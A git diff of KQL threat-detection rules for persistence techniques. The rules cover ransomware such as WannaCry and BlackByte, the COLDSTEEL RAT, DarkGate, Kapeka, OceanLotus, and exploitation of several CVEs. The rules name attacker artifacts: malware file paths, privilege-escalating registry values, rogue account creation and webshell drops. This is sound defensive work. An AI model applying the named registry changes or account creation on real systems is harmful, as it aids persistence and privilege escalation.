+DeviceProcessEvents | where ProcessCommandLine contains "@Please_Read_Me@.txt" or ((FolderPath endswith "\\tasksche.exe" or FolderPath endswith "\\mssecsvc.exe" or FolderPath endswith "\\taskdl.exe" or FolderPath endswith "\\taskhsvc.exe" or FolderPath endswith "\\taskse.exe" or FolderPath endswith "\\111.exe" or FolderPath endswith "\\lhdfrgui.exe" or FolderPath endswith "\\linuxnew.exe" or FolderPath endswith "\\wannacry.exe") or FolderPath contains "WanaDecryptor") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql index 69cf42b9..1e9363ef 100644 --- a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql +++ b/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql @@ -1,12 +1,12 @@ -// Title: Blackbyte Ransomware Registry -// Author: frack113 -// Date: 2022-01-24 -// Level: high -// Description: Detects specific windows registry modifications made by BlackByte ransomware variants. -// BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption. -// This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats - -DeviceRegistryEvents +// Title: Blackbyte Ransomware Registry +// Author: frack113 +// Date: 2022-01-24 +// Level: high +// Description: Detects specific windows registry modifications made by BlackByte ransomware variants. +// BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption. +// This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql b/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql index b5e28149..b8923aab 100644 --- a/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql +++ b/KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql @@ -1,10 +1,10 @@ -// Title: Blue Mockingbird -// Author: Trent Liffick (@tliffick) -// Date: 2020-05-14 -// Level: high -// Description: Attempts to detect system changes made by Blue Mockingbird -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, attack.t1047, detection.emerging-threats - -DeviceProcessEvents +// Title: Blue Mockingbird +// Author: Trent Liffick (@tliffick) +// Date: 2020-05-14 +// Level: high +// Description: Attempts to detect system changes made by Blue Mockingbird +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, attack.t1047, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine contains "sc config" and ProcessCommandLine contains "wercplsupporte.dll") and FolderPath endswith "\\cmd.exe") or (ProcessCommandLine endswith "COR_PROFILER" and FolderPath endswith "\\wmic.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql index 92ec323a..fa35da9f 100644 --- a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql +++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql @@ -1,10 +1,10 @@ -// Title: COLDSTEEL RAT Anonymous User Process Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-30 -// Level: high -// Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats - -DeviceProcessEvents +// Title: COLDSTEEL RAT Anonymous User Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-30 +// Level: high +// Description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceProcessEvents | where (InitiatingProcessFolderPath contains "\\Windows\\System32\\" or InitiatingProcessFolderPath contains "\\AppData\\") and AccountName contains "ANONYMOUS" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql index 97427716..d8fadd66 100644 --- a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql +++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql @@ -1,12 +1,12 @@ -// Title: COLDSTEEL RAT Cleanup Command Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-30 -// Level: critical -// Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: COLDSTEEL RAT Cleanup Command Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-30 +// Level: critical +// Description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "UpdateDriverForPlugAndPlayDevicesW" or ProcessCommandLine contains "ServiceMain" or ProcessCommandLine contains "DiUninstallDevice") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessCommandLine contains " -k msupdate" or InitiatingProcessCommandLine contains " -k msupdate2" or InitiatingProcessCommandLine contains " -k alg") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql index f4bd0418..eb01a484 100644 --- a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql +++ b/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql @@ -1,12 +1,12 @@ -// Title: COLDSTEEL RAT Service Persistence Execution -// Author: X__Junior (Nextron Systems) -// Date: 2023-04-30 -// Level: critical -// Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: COLDSTEEL RAT Service Persistence Execution +// Author: X__Junior (Nextron Systems) +// Date: 2023-04-30 +// Level: critical +// Description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine endswith " -k msupdate" or ProcessCommandLine endswith " -k msupdate2" or ProcessCommandLine endswith " -k alg") and FolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql index ef2106e1..de3a5dc5 100644 --- a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql +++ b/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql @@ -1,11 +1,11 @@ -// Title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-20 -// Level: high -// Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop. -// This is a post-authentication step corresponding to CVE-2025-57790. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790 - -DeviceProcessEvents +// Title: Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790) +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: high +// Description: Detects the use of qoperation.exe with the -file argument to write a JSP file to the webroot, indicating a webshell drop. +// This is a post-authentication step corresponding to CVE-2025-57790. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003, detection.emerging-threats, cve.2025-57790 + +DeviceProcessEvents | where ProcessCommandLine contains "qoperation" and ProcessCommandLine contains "exec" and ProcessCommandLine contains " -af " and ProcessCommandLine contains ".xml " and ProcessCommandLine contains "\\Apache\\webapps\\ROOT\\" and ProcessCommandLine contains ".jsp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql index 71d7f04e..24dc5f58 100644 --- a/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql +++ b/KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql @@ -1,13 +1,13 @@ -// Title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry -// Author: EagleEye Team, Florian Roth (Nextron Systems), NVISO -// Date: 2020-05-13 -// Level: high -// Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. -// This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats -// False Positives: -// - New printer port install on host - -DeviceRegistryEvents +// Title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry +// Author: EagleEye Team, Florian Roth (Nextron Systems), NVISO +// Date: 2020-05-13 +// Level: high +// Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. +// This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.t1112, cve.2020-1048, detection.emerging-threats +// False Positives: +// - New printer port install on host + +DeviceRegistryEvents | where (RegistryValueData contains ".bat" or RegistryValueData contains ".com" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".ps1" or RegistryValueData contains ".vbe" or RegistryValueData contains ".vbs" or RegistryValueData contains "C:") and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Ports" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql index 8a984262..34569775 100644 --- a/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql +++ b/KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql @@ -1,12 +1,12 @@ -// Title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation -// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress -// Date: 2024-02-21 -// Level: medium -// Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. -// MITRE Tactic: Persistence -// Tags: attack.persistence, cve.2024-1708, detection.emerging-threats -// False Positives: -// - This will occur legitimately as well and will result in some benign activity. - -DeviceFileEvents +// Title: CVE-2024-1708 - ScreenConnect Path Traversal Exploitation +// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress +// Date: 2024-02-21 +// Level: medium +// Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. +// MITRE Tactic: Persistence +// Tags: attack.persistence, cve.2024-1708, detection.emerging-threats +// False Positives: +// - This will occur legitimately as well and will result in some benign activity. + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and ((FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".ashx") or (FolderPath contains "ScreenConnect\\App_Extensions\\" and FolderPath contains ".aspx"))) and (not(FolderPath =~ "*ScreenConnect\\App_Extensions\*\*")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql b/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql index e8f35600..34c15e9f 100644 --- a/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql +++ b/KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: DarkGate - User Created Via Net.EXE -// Author: X__Junior (Nextron Systems) -// Date: 2023-08-27 -// Level: high -// Description: Detects creation of local users via the net.exe command with the name of "DarkGate" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1136.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: DarkGate - User Created Via Net.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-27 +// Level: high +// Description: Detects creation of local users via the net.exe command with the name of "DarkGate" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "DarkGate" and ProcessCommandLine contains "SafeMode") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql b/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql index 3b05056b..ea8f29ac 100644 --- a/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql +++ b/KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql @@ -1,10 +1,10 @@ -// Title: Exploiting SetupComplete.cmd CVE-2019-1378 -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019-11-15 -// Level: high -// Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.execution, attack.t1059.003, attack.t1574, cve.2019-1378, detection.emerging-threats - -DeviceProcessEvents +// Title: Exploiting SetupComplete.cmd CVE-2019-1378 +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2019-11-15 +// Level: high +// Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.execution, attack.t1059.003, attack.t1574, cve.2019-1378, detection.emerging-threats + +DeviceProcessEvents | where ((InitiatingProcessCommandLine contains "\\cmd.exe" and InitiatingProcessCommandLine contains "/c" and InitiatingProcessCommandLine contains "C:\\Windows\\Setup\\Scripts\\") and (InitiatingProcessCommandLine endswith "SetupComplete.cmd" or InitiatingProcessCommandLine endswith "PartnerSetupComplete.cmd")) and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Windows\\Setup\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql index 6e7e53bd..01d34437 100644 --- a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql +++ b/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql @@ -1,11 +1,11 @@ -// Title: Kapeka Backdoor Configuration Persistence -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-07-03 -// Level: medium -// Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. -// The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats - -DeviceRegistryEvents +// Title: Kapeka Backdoor Configuration Persistence +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: medium +// Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. +// The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats + +DeviceRegistryEvents | where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\{" and RegistryKey endswith "\\Seed") and (not(RegistryValueData contains "(Empty)")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql b/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql index d4cf62d1..f7bf0450 100644 --- a/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql +++ b/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql @@ -1,10 +1,10 @@ -// Title: Moriya Rootkit File Created -// Author: Bhabesh Raj -// Date: 2021-05-06 -// Level: critical -// Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003, detection.emerging-threats - -DeviceFileEvents +// Title: Moriya Rootkit File Created +// Author: Bhabesh Raj +// Date: 2021-05-06 +// Level: critical +// Description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003, detection.emerging-threats + +DeviceFileEvents | where FolderPath =~ "C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql b/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql index c645af9b..4a349ff4 100644 --- a/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql +++ b/KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql @@ -1,10 +1,10 @@ -// Title: OceanLotus Registry Activity -// Author: megan201296, Jonhnathan Ribeiro -// Date: 2019-04-14 -// Level: critical -// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats - -DeviceRegistryEvents +// Title: OceanLotus Registry Activity +// Author: megan201296, Jonhnathan Ribeiro +// Date: 2019-04-14 +// Level: critical +// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey endswith "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a*" or RegistryKey endswith "Classes\\AppX3bbba44c6cae4d9695755183472171e2*" or RegistryKey endswith "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}*" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey endswith "\\SOFTWARE\\App*" and ((RegistryKey endswith "AppXbf13d4ea2945444d8b13e2121cb6b663*" or RegistryKey endswith "AppX70162486c7554f7f80f481985d67586d*" or RegistryKey endswith "AppX37cc7fdccd644b4f85f4b22d5a3f105a*") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql b/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql index 0d6c789b..b80bf182 100644 --- a/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql +++ b/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql @@ -1,12 +1,12 @@ -// Title: Outlook Task/Note Reminder Received -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-05 -// Level: low -// Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137, cve.2023-23397, detection.emerging-threats -// False Positives: -// - Legitimate reminders received for a task or a note will also trigger this rule. - -DeviceRegistryEvents +// Title: Outlook Task/Note Reminder Received +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-05 +// Level: low +// Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137, cve.2023-23397, detection.emerging-threats +// False Positives: +// - Legitimate reminders received for a task or a note will also trigger this rule. + +DeviceRegistryEvents | where (RegistryKey endswith "\\Tasks*" or RegistryKey endswith "\\Notes*") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook*") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql index a8a4410a..3f5da515 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql @@ -1,10 +1,10 @@ -// Title: Potential BearLPE Exploitation -// Author: Olaf Hartong -// Date: 2019-05-22 -// Level: high -// Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, car.2013-08-001, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential BearLPE Exploitation +// Author: Olaf Hartong +// Date: 2019-05-22 +// Level: high +// Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, car.2013-08-001, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "/change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/RP") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql index 05ec713c..cb9cc6c3 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql @@ -1,10 +1,10 @@ -// Title: Potential COLDSTEEL Persistence Service DLL Creation -// Author: X__Junior (Nextron Systems) -// Date: 2023-04-30 -// Level: high -// Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats - -DeviceFileEvents +// Title: Potential COLDSTEEL Persistence Service DLL Creation +// Author: X__Junior (Nextron Systems) +// Date: 2023-04-30 +// Level: high +// Description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents | where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql index 3d759b47..5053c50b 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql @@ -1,12 +1,12 @@ -// Title: Potential COLDSTEEL Persistence Service DLL Load -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-02 -// Level: high -// Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential COLDSTEEL Persistence Service DLL Load +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-02 +// Level: high +// Description: Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath endswith "\\AppData\\Roaming\\newdev.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql index 7a667ab9..e899daa3 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql @@ -1,10 +1,10 @@ -// Title: Potential COLDSTEEL RAT File Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-30 -// Level: high -// Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats - -DeviceFileEvents +// Title: Potential COLDSTEEL RAT File Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-30 +// Level: high +// Description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents | where FolderPath =~ "C:\\users\\public\\Documents\\dllhost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql index 36902f6b..1d27b967 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql @@ -1,10 +1,10 @@ -// Title: Potential COLDSTEEL RAT Windows User Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-02 -// Level: high -// Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. -// MITRE Tactic: Persistence -// Tags: attack.persistence, detection.emerging-threats - -DeviceRegistryEvents +// Title: Potential COLDSTEEL RAT Windows User Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-02 +// Level: high +// Description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT. +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats + +DeviceRegistryEvents | where (RegistryValueData contains "ANONYMOUS" or RegistryValueData contains "_DomainUser_") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-" and RegistryKey contains "\\ProfileImagePath") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql index 2cf6fc66..7b0f4745 